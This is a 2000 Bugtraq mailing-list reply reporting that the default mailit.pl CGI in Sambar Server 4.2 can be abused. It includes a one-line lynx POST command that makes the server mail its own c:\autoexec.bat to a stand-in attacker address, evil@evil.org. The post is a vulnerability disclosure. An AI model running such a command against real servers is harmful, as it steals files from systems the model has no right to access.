[14023] in bugtraq
Re: Sambar Server alert! (2)
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Fri Feb 25 17:58:21 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <200002251411.PAA05836@gtc1.cps.unizar.es>
Date: Fri, 25 Feb 2000 15:11:43 +0100
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38B50F5C.F2ED0878@cybcom.net> from "Georgi Chorbadzhiyski" at
Feb 24, 0 01:00:44 pm
This is not the only problem with default CGI's included with
sambar 4.2.
Have you tried
echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl
?
--
finger spd@gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
